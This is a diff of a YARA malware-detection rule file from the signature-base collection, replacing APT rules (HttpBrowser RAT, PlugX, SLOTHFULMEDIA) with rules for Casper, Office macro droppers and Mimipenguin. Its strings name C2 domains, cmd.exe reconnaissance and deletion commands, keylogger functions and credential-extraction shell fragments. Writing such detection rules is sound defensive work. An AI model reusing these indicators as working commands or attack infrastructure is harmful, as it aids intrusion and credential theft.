-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L138-L158"
+		reference = "http://goo.gl/VRJNLo"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_casper.yar#L37-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9bf3c6c93e77424463e3fb6f9f4d58e80254866462fe1287293b0a357737da20"
-		score = 75
+		hash = "e4cc35792a48123e71a2c7b6aa904006343a157a"
+		logic_hash = "8ffba5598078fdadf2d9e8ee7fe0fef8b3b89517490a379d46cab33cd0036d6e"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$mutex = "M&GX^DSF&DA@F"
+		$s0 = "<Command>" fullword ascii
+		$s1 = "</Command>" fullword ascii
+		$s2 = "\" /d \"" fullword ascii
+		$s4 = "'%s' %s" fullword ascii
+		$s5 = "nKERNEL32.DLL" fullword wide
+		$s6 = "@ReturnValue" fullword wide
+		$s7 = "ID: 0x%x" fullword ascii
+		$s8 = "Name: %S" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $mutex
+		7 of them
 }
-rule SIGNATURE_BASE_Slserver_Command_And_Control : FILE
+rule SIGNATURE_BASE_Casper_Included_Strings : FILE
 {
 	meta:
-		description = "Searches for the C2 server."
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "e4fcda6c-1c9f-5b58-8b07-8d1a0dc4eaf6"
-		date = "2016-04-18"
+		description = "Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo"
+		author = "Florian Roth (Nextron Systems)"
+		id = "34ba474d-0858-534a-8f32-db5a709e8814"
+		date = "2015-03-06"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L160-L180"
+		reference = "http://goo.gl/VRJNLo"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_casper.yar#L60-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "48a13d27b7dc9a7f3a65752142b2a291e7c3ee93ef67b36aa4202d065e74d80e"
-		score = 75
+		logic_hash = "8796f45e459747db6bc08f362db7b152242f9f5bda3b72ddfc739cc9dcdfc55f"
+		score = 50
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$c2 = "safetyssl.security-centers.com"
+		$a0 = "cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST"
+		$a1 = "& SYSTEMINFO) ELSE EXIT"
+		$c1 = "domcommon.exe" wide fullword
+		$c2 = "jpic.gov.sy" fullword
+		$c3 = "aiomgr.exe" wide fullword
+		$c4 = "perfaudio.dat" fullword
+		$c5 = "Casper_DLL.dll" fullword
+		$c6 = { 7B 4B 59 DE 37 4A 42 26 59 98 63 C6 2D 0F 57 40 }
+		$c7 = "{4216567A-4512-9825-7745F856}" fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $c2
+		all of ( $a* ) or uint16( 0 ) == 0x5a4d and ( 1 of ( $c* ) )
 }
-rule SIGNATURE_BASE_Slserver_Campaign_Code : FILE
+rule SIGNATURE_BASE_Casper_Systeminformation_Output
 {
 	meta:
-		description = "Searches for the related campaign code."
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "672f506e-0cc1-5b09-873b-c3d206486bac"
-		date = "2016-04-18"
+		description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
+		author = "Florian Roth (Nextron Systems)"
+		id = "aaae200c-7ef1-52eb-be5b-36e0ad29ecef"
+		date = "2015-03-06"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L182-L202"
+		reference = "http://goo.gl/VRJNLo"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_casper.yar#L85-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fbf53678399b0e14eae6f1bb6594b2aa665f76f10388e492bec2f9101a4dd4b1"
-		score = 75
+		logic_hash = "83c6216bc3e7fadfe81b9bbaca7b14e3398e972f8298c99a8eb576a40e4b4e1b"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$campaign = "wthkdoc0106"
+		$a0 = "***** SYSTEM INFORMATION ******"
+		$a1 = "***** SECURITY INFORMATION ******"
+		$a2 = "Antivirus: "
+		$a3 = "Firewall: "
+		$a4 = "***** EXECUTION CONTEXT ******"
+		$a5 = "Identity: "
+		$a6 = "<CONFIG TIMESTAMP="
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $campaign
+		all of them
 }
-rule SIGNATURE_BASE_Slserver_Unknown_String : FILE
+rule SIGNATURE_BASE_SUSP_Office_Dropper_Strings : FILE
 {
 	meta:
-		description = "Searches for a unique string."
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "00341604-480f-59aa-9c18-009e7b53928e"
-		date = "2016-04-18"
+		description = "Detects Office droppers that include a notice to enable active content"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6560fdf7-46e8-5c16-8263-a36f1dec7868"
+		date = "2018-09-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L204-L224"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_office_dropper.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "18d3bb236282c506c161949883722da1cb0af6dd87bf5cb3d4a5b3d90f4a7db0"
-		score = 75
+		logic_hash = "3a66a86eb99a3e7cd02e3444714c6c88b423cd0ea1e6210bf91da01cf804105f"
+		score = 65
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$string = "test-b7fa835a39"
+		$a1 = "_VBA_PROJECT" wide
+		$s1 = "click enable editing" fullword ascii
+		$s2 = "click enable content" fullword ascii
+		$s3 = "\"Enable Editing\"" fullword ascii
+		$s4 = "\"Enable Content\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $string
+		uint16( 0 ) == 0xcfd0 and filesize < 500KB and $a1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_APT_MAL_SLOTHFULMEDIA_Oct20_1 : FILE
+rule SIGNATURE_BASE_SUSP_Enablecontent_String_Gen : FILE
 {
 	meta:
-		description = "Detects SLOTHFULMEDIA malware"
+		description = "Detects suspicious string that asks to enable active content in Office Doc"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc413225-f084-5859-bc27-04eb018d8894"
-		date = "2020-10-01"
+		id = "d763bc21-2925-55df-85e0-1ee857e921ca"
+		date = "2019-02-12"
 		modified = "2023-12-05"
-		reference = "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_iamtheking.yar#L2-L48"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_office_dropper.yar#L19-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e50bda40eb05767e0903c3d8dd62b4e0290d89740c82c8b7f391d5763dc35156"
-		score = 75
+		logic_hash = "cde995ab0486fdafdc98e36c28a1f786ee7485387158f7337acd5f7dd0e3fed1"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		hash1 = "64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273"
-		hash2 = "927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae"
-		hash3 = "f0503f0131040b805e106eafe64a65d9404a0e279f052237b868e456c34d36e6"
-		hash4 = "ed5258306c06d6fac9b13c99c7c8accc7f7fa0de4cf4de4f7d9eccad916555f5"
-		hash5 = "04ca010f4c8997a023fabacae230698290e3ff918a86703c5e0a2a6983b039eb"
-		hash6 = "cb2adcaaa25bb6b8a9f1c685c219f8d6d78aa5cfd65c633f4d255ff81da2c517"
+		hash1 = "525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de"
 
 	strings:
-		$xc1 = { 25 73 26 69 3D 25 64 00 48 54 54 50 2F 31 2E 31
-               00 00 00 00 50 4F 53 54 00 00 00 00 43 6F 6E 74
-               65 6E 74 2D 4C 65 6E 67 74 68 3A 20 25 64 00 00
-               5C 00 53 00 65 00 74 00 75 00 70 00 55 00 69 00
-               00 00 00 00 25 00 73 00 25 00 73 00 5F 00 25 00
-               64 00 2E 00 64 00 61 00 74 }
-		$xc2 = { 2F 76 3F 6D 3D 00 00 00 35 30 31 00 32 30 30 00
-               2A 00 2E 00 2A 00 00 00 25 00 73 00 00 00 00 00
-               53 00 65 00 44 00 65 00 62 00 75 00 67 00 50 00
-               72 00 69 00 76 00 69 00 6C 00 65 00 67 00 65 }
-		$xc3 = { 00 25 00 73 00 7C 00 25 00 73 00 7C 00 25 00 73
-               00 7C 00 25 00 73 00 00 00 5C 00 46 00 69 00 6C
-               00 74 00 65 00 72 00 33 00 2E 00 6A 00 70 00 67 }
-		$sc1 = { 25 74 65 6D 70 25 00 00 25 73 5C 25 73 2E 65 78
-               65 00 00 00 25 74 65 6D 70 25 00 00 25 73 5C 25
-               73 2E 65 78 65 }
-		$sc2 = { 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65
-               74 2D 73 74 72 65 61 6D 2C 61 70 70 6C 69 63 61
-               74 69 6F 6E 2F 78 68 74 6D 6C 00 00 25 73 26 69
-               3D 25 64 00 48 54 54 50 2F 31 2E 31 00 00 00 00
-               50 4F 53 54 }
-		$s1 = "%s%s_%d.dat" wide fullword
-		$s2 = "Local Security Process" wide fullword
-		$s3 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75" ascii fullword
-		$s4 = "Global%s%d" wide fullword
-		$s5 = "ExtKeyloggerStart" ascii fullword
-		$s6 = "GetExtendedTcpTable" ascii fullword
+		$e1 = "Enable Editing" fullword ascii
+		$e2 = "Enable Content" fullword ascii
+		$e3 = "Enable editing" fullword ascii
+		$e4 = "Enable content" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
+		uint16( 0 ) == 0xcfd0 and ( $e1 in ( 0 .. 3000 ) or $e2 in ( 0 .. 3000 ) or $e3 in ( 0 .. 3000 ) or $e4 in ( 0 .. 3000 ) or 2 of them )
 }
-rule SIGNATURE_BASE_Metasploit_Loader_Rsmudge : FILE
+rule SIGNATURE_BASE_SUSP_Worddoc_VBA_Macro_Strings : FILE
 {
 	meta:
-		description = "Detects a Metasploit Loader by RSMudge - file loader.exe"
+		description = "Detects suspicious strings in Word Doc that indcate malicious use of VBA macros"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4d8a215e-a942-5df9-bdad-0c4158992429"
-		date = "2016-04-20"
+		id = "210baf6e-ec67-5bc4-ba27-6a6de0c11a73"
+		date = "2019-02-12"
 		modified = "2023-12-05"
-		reference = "https://github.com/rsmudge/metasploit-loader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_loader_rsmudge.yar#L10-L27"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_office_dropper.yar#L42-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "50b1898e3087a5e0876b87179252c452af48e00bbef52297060d70acd90d0133"
-		score = 75
+		logic_hash = "441e4a8e90d6045d0ad6a959ce56e834960c48083343add8e4f519f4b83bc82d"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "afe34bfe2215b048915b1d55324f1679d598a0741123bc24274d4edc6e395a8d"
+		hash1 = "525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de"
 
 	strings:
-		$s1 = "Could not resolve target" fullword ascii
-		$s2 = "Could not connect to target" fullword ascii
-		$s3 = "%s [host] [port]" fullword ascii
-		$s4 = "ws2_32.dll is out of date." fullword ascii
-		$s5 = "read a strange or incomplete length value" fullword ascii
+		$a1 = "\\Microsoft Shared\\" ascii
+		$a2 = "\\VBA\\" ascii
+		$a3 = "Microsoft Office Word" fullword ascii
+		$a4 = "PROJECTwm" fullword wide
+		$s1 = "AppData" fullword ascii
+		$s2 = "Document_Open" fullword ascii
+		$s3 = "Project1" fullword ascii
+		$s4 = "CreateObject" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 3 of ( $s* ) ) ) or ( all of them )
+		uint16( 0 ) == 0xcfd0 and filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_Httpbrowser_RAT_Dropper_Gen1 : FILE
+rule SIGNATURE_BASE_SUSP_Officedoc_VBA_Base64Decode : FILE
 {
 	meta:
-		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper"
+		description = "Detects suspicious VBA code with Base64 decode functions"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2e347024-ac5f-5e8c-a8b0-53eaa9a03979"
-		date = "2015-08-06"
+		id = "99690116-fc89-53d7-8f29-575d75d53fc9"
+		date = "2019-06-21"
 		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L8-L48"
+		reference = "https://github.com/cpaton/Scripting/blob/master/VBA/Base64.bas"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_office_dropper.yar#L65-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "927821e974cff6cd4d15b19bf4d0486abc57725ecdf6f00755dd4f912fbf82d1"
+		logic_hash = "1fb094c9991f93e9d1003832dc11a58efa8281e9fe844e61e27dfd077f55ad39"
 		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "808de72f1eae29e3c1b2c32be1b84c5064865a235866edf5e790d2a7ba709907"
-		hash2 = "f6f966d605c5e79de462a65df437ddfca0ad4eb5faba94fc875aba51a4b894a7"
-		hash3 = "f424965a35477d822bbadb821125995616dc980d3d4f94a68c87d0cd9b291df9"
-		hash4 = "01441546fbd20487cb2525a0e34e635eff2abe5c3afc131c7182113220f02753"
-		hash5 = "8cd8159f6e4689f572e2087394452e80e62297af02ca55fe221fe5d7570ad47b"
-		hash6 = "10de38419c9a02b80ab7bf2f1f1f15f57dbb0fbc9df14b9171dc93879c5a0c53"
-		hash7 = "c2fa67e970d00279cec341f71577953d49e10fe497dae4f298c2e9abdd3a48cc"
+		hash1 = "52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc"
 
 	strings:
-		$x1 = "1001=cmd.exe" fullword ascii
-		$x2 = "1003=ShellExecuteA" fullword ascii
-		$x3 = "1002=/c del /q %s" fullword ascii
-		$x4 = "1004=SetThreadPriority" fullword ascii
-		$op0 = { e8 71 11 00 00 83 c4 10 ff 4d e4 8b f0 78 07 8b }
-		$op1 = { e8 85 34 00 00 59 59 8b 86 b4 }
-		$op2 = { 8b 45 0c 83 38 00 0f 84 97 }
-		$op3 = { 8b 45 0c 83 38 00 0f 84 98 }
-		$op4 = { 89 7e 0c ff 15 a0 50 40 00 59 8b d8 6a 20 59 8d }
-		$op5 = { 56 8d 85 cd fc ff ff 53 50 88 9d cc fc ff ff e8 }
+		$s1 = "B64_CHAR_DICT" ascii
+		$s2 = "Base64Decode" ascii
+		$s3 = "Base64Encode" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of ( $x* ) and 1 of ( $op* )
+		uint16( 0 ) == 0xcfd0 and filesize < 60KB and 2 of them
 }
-rule SIGNATURE_BASE_Httpbrowser_RAT_Sample1 : FILE
+rule SIGNATURE_BASE_SUSP_VBA_Filesystem_Access : FILE
 {
 	meta:
-		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample update.hancominc.com"
+		description = "Detects suspicious VBA that writes to disk and is activated on document open"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8babf47f-006c-5001-9753-08ac08f5e861"
-		date = "2015-08-06"
+		id = "91241b91-ca3f-5817-bf78-550fe015b467"
+		date = "2019-06-21"
 		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L50-L65"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_office_dropper.yar#L82-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "746df577e952e0354342a48fe9f1650e63e3470902e7c5bba36d36fa34ea2bff"
-		score = 80
+		logic_hash = "13d7e0708968a7700308e6216ea5d0a396f9335137ae1e33c3b34a2f54012ec6"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "be334d1f8fa65a723af65200a166c2bbdb06690c8b30fafe772600e4662fc68b"
-		hash2 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb"
+		hash1 = "52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc"
 
 	strings:
-		$s0 = "update.hancominc.com" fullword wide
+		$s1 = "\\Common Files\\Microsoft Shared\\" wide
+		$s2 = "Scripting.FileSystemObject" ascii
+		$a1 = "Document_Open" ascii
+		$a2 = "WScript.Shell" ascii
+		$a3 = "AutoOpen" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and $s0
+		uint16( 0 ) == 0xcfd0 and filesize < 100KB and all of ( $s* ) and 1 of ( $a* )
 }
-rule SIGNATURE_BASE_Httpbrowser_RAT_Sample2 : FILE
+rule SIGNATURE_BASE_SUSP_Excel_IQY_Remoteuri_Syntax : FILE
 {
 	meta:
-		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "693d381f-50b0-5f06-b725-78243b67092c"
-		date = "2015-08-06"
-		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L67-L84"
+		description = "Detects files with Excel IQY RemoteURI syntax"
+		author = "Nick Carr"
+		id = "ea3427da-9cce-5ad9-9c78-e3cee802ba80"
+		date = "2018-08-17"
+		modified = "2023-11-25"
+		reference = "https://twitter.com/ItsReallyNick/status/1030330473954897920"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_office_dropper.yar#L102-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c7e945131a867bf46a467784d7119c95342733cc723cdeeb76d69c8fdb326749"
-		score = 80
+		logic_hash = "7033b0a4226dd289ecc670a0807e4159dd4486f52bc80a6b5ddd34d6961ab163"
+		score = 55
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992"
 
 	strings:
-		$s0 = "nKERNEL32.DLL" fullword wide
-		$s1 = "WUSER32.DLL" fullword wide
-		$s2 = "mscoree.dll" fullword wide
-		$s3 = "VPDN_LU.exeUT" fullword ascii
+		$URL = "http"
+		$fp1 = "https://go.microsoft.com"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
+		uint32( 0 ) == 0x0d424557 and uint32( 4 ) == 0x0a0d310a and filesize < 1MB and $URL and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Httpbrowser_RAT_Gen : FILE
+rule SIGNATURE_BASE_SUSP_Macro_Sheet_Obfuscated_Char : FILE
 {
 	meta:
-		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Generic"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0ba9facb-7385-56ce-9e20-d86261a39cd1"
-		date = "2015-08-06"
+		description = "Finding hidden/very-hidden macros with many CHAR functions"
+		author = "DissectMalware"
+		id = "791e9bba-3e4e-5efd-a800-a612c6f92cfb"
+		date = "2020-04-07"
 		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L86-L124"
+		reference = "https://twitter.com/DissectMalware/status/1247595433305800706"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_office_dropper.yar#L122-L139"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cbc1dec88994427fc5003c9506f5a766531136ee80a16d00d2bf5bd5d7990cb3"
-		score = 90
+		logic_hash = "0953d1f916df570cb3d053bf4fdac196bdbd806df4b6c0a982ed9949a3676e6c"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0299493ccb175d452866f5e21d023d3e92cd8d28452517d1d19c0f05f2c5ca27"
-		hash2 = "065d055a90da59b4bdc88b97e537d6489602cb5dc894c5c16aff94d05c09abc7"
-		hash3 = "05c7291db880f94c675eea336ecd66338bd0b1d49ad239cc17f9df08106e6684"
-		hash4 = "07133f291fe022cd14346cd1f0a649aa2704ec9ccadfab809ca9c48b91a7d81b"
-		hash5 = "0f8893e87ddec3d98e39a57f7cd530c28e36d596ea0a1d9d1e993dc2cae0a64d"
-		hash6 = "108e6633744da6efe773eb78bd0ac804920add81c3dde4b26e953056ac1b26c5"
-		hash7 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb"
-		hash8 = "1277ede988438d4168bb5b135135dd3b9ae7d9badcdf1421132ca4692dd18386"
-		hash9 = "19be90c152f7a174835fd05a0b6f722e29c648969579ed7587ae036679e66a7b"
-		hash10 = "1e7133bf5a9fe5e462321aafc2b7770b8e4183a66c7fef14364a0c3f698a29af"
-		hash11 = "2264e5e8fcbdcb29027798b200939ecd8d1d3ad1ef0aef2b8ce7687103a3c113"
-		hash12 = "2a1bdeb0a021fb0bdbb328bd4b65167d1f954c871fc33359cb5ea472bad6e13e"
-		hash13 = "259a2e0508832d0cf3f4f5d9e9e1adde17102d2804541a9587a9a4b6f6f86669"
-		hash14 = "240d9ce148091e72d8f501dbfbc7963997d5c2e881b4da59a62975ddcbb77ca2"
-		hash15 = "211a1b195cf2cc70a2caf8f1aafb8426eb0e4bae955e85266490b12b5322aa16"
-		hash16 = "2d25c6868c16085c77c58829d538b8f3dbec67485f79a059f24e0dce1e804438"
-		hash17 = "2d932d764dd9b91166361d8c023d64a4480b5b587a6087b0ce3d2ac92ead8a7d"
-		hash18 = "3556722d9aa37beadfa6ba248a66576f767e04b09b239d3fb0479fa93e0ba3fd"
-		hash19 = "365e1d4180e93d7b87ba28ce4369312cbae191151ac23ff4a35f45440cb9be48"
-		hash20 = "36c49f18ce3c205152eef82887eb3070e9b111d35a42b534b2fb2ee535b543c0"
-		hash21 = "3eeb1fd1f0d8ab33f34183893c7346ddbbf3c19b94ba3602d377fa2e84aaad81"
-		hash22 = "3fa8d13b337671323e7fe8b882763ec29b6786c528fa37da773d95a057a69d9a"
+		hash1 = "0e9ec7a974b87f4c16c842e648dd212f80349eecb4e636087770bc1748206c3b"
 
 	strings:
-		$s0 = "%d|%s|%04d/%02d/%02d %02d:%02d:%02d|%ld|%d" fullword wide
-		$s1 = "HttpBrowser/1.0" fullword wide
-		$s2 = "set cmd : %s" ascii fullword
-		$s3 = "\\config.ini" wide fullword
+		$ole_marker = {D0 CF 11 E0 A1 B1 1A E1}
+		$s1 = "Excel" fullword ascii
+		$macro_sheet_h1 = {85 00 ?? ?? ?? ?? ?? ?? 01 01}
+		$macro_sheet_h2 = {85 00 ?? ?? ?? ?? ?? ?? 02 01}
+		$char_func = {06 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 1E 3D  00 41 6F 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 45KB and filesize > 20KB and all of them
+		$ole_marker at 0 and 1 of ( $macro_sheet_h* ) and #char_func > 10 and $s1
 }
-rule SIGNATURE_BASE_Plugx_Nvsmartmax_Gen : FILE
+rule SIGNATURE_BASE_Mimipenguin_SH
 {
 	meta:
-		description = "Threat Group 3390 APT Sample - PlugX NvSmartMax Generic"
+		description = "Detects Mimipenguin Password Extractor - Linux"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5ecd25a8-9717-527f-bb6e-3259b9a60458"
-		date = "2015-08-06"
+		id = "c670f6fe-562d-598f-a73f-45e4ab234f7d"
+		date = "2017-04-01"
 		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L126-L154"
+		reference = "https://github.com/huntergregal/mimipenguin"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimipenguin.yar#L8-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7795b0d978f9447a6cee808708d65992447e359539a8fe64331c06ad46ff7491"
-		score = 70
+		logic_hash = "5d9827e7adfe667a4a46e23854cac3b63949abcde5709045f0fe65e7b5704265"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "718fc72942b9b706488575c0296017971170463f6f40fa19b08fc84b79bf0cef"
-		hash2 = "1c0379481d17fc80b3330f148f1b87ff613cfd2a6601d97920a0bcd808c718d0"
-		hash3 = "555952aa5bcca4fa5ad5a7269fece99b1a04816d104ecd8aefabaa1435f65fa5"
-		hash4 = "71f7a9da99b5e3c9520bc2cc73e520598d469be6539b3c243fb435fe02e44338"
-		hash5 = "65bbf0bd8c6e1ccdb60cf646d7084e1452cb111d97d21d6e8117b1944f3dc71e"
 
 	strings:
-		$s0 = "NvSmartMax.dll" fullword ascii
-		$s1 = "NvSmartMax.dll.url" fullword ascii
-		$s2 = "Nv.exe" fullword ascii
-		$s4 = "CryptProtectMemory failed" fullword ascii
-		$s5 = "CryptUnprotectMemory failed" fullword ascii
-		$s7 = "r%.*s(%d)%s" fullword wide
-		$s8 = " %s CRC " fullword wide
-		$op0 = { c6 05 26 49 42 00 01 eb 4a 8d 85 00 f8 ff ff 50 }
-		$op1 = { 8d 85 c8 fe ff ff 50 8d 45 c8 50 c6 45 47 00 e8 }
-		$op2 = { e8 e6 65 00 00 50 68 10 43 41 00 e8 56 84 00 00 }
+		$s1 = "$(echo $thishash | cut -d'$' -f 3)" ascii
+		$s2 = "ps -eo pid,command | sed -rn '/gnome\\-keyring\\-daemon/p' | awk" ascii
+		$s3 = "MimiPenguin Results:" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of ( $s* ) and 1 of ( $op* )
+		1 of them
 }
-rule SIGNATURE_BASE_Httpbrowser_RAT_Dropper_Gen2 : FILE
+rule SIGNATURE_BASE_Mimipenguin_1 : FILE
 {
 	meta:
